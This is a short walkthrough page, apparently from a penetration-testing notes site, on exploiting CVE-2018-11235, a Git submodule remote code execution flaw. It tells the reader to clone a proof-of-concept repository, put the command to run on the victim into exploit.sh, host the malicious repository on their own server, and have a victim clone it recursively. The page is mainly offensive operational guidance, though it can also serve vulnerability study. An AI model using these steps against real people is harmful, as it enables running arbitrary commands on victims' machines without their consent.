Skip to main content

cve-2018-11235-git-submodule-rce

CVE-2018-11235: Git Submodule RCE

This vulnerability can be used to target clients cloning a remote directory. This vulnerability has been covered in details in the following blog post.

danger

Github and Gitlab have put protections in place to prevent people from creating a malicious repository on their services. Therefore, you will need to host your own git repository to exploit this issue.

Creating Repo (Using a Script)

Clone the repository:

git clone https://github.com/Rezy-Dev/CVE-2018-11235
cd CVE-2018-11235

Edit exploit.sh and put the command you want to run on the victim.
Run the script. After done, run apache2 server with the PoC Repo:

TODO image

When victim clones it like:

git clone --recurse-submodules http://vps-ip/malicious.git

The payload command should execute.

CVE-2018-11235: Git Submodule RCE
- Creating Repo (Using a Script)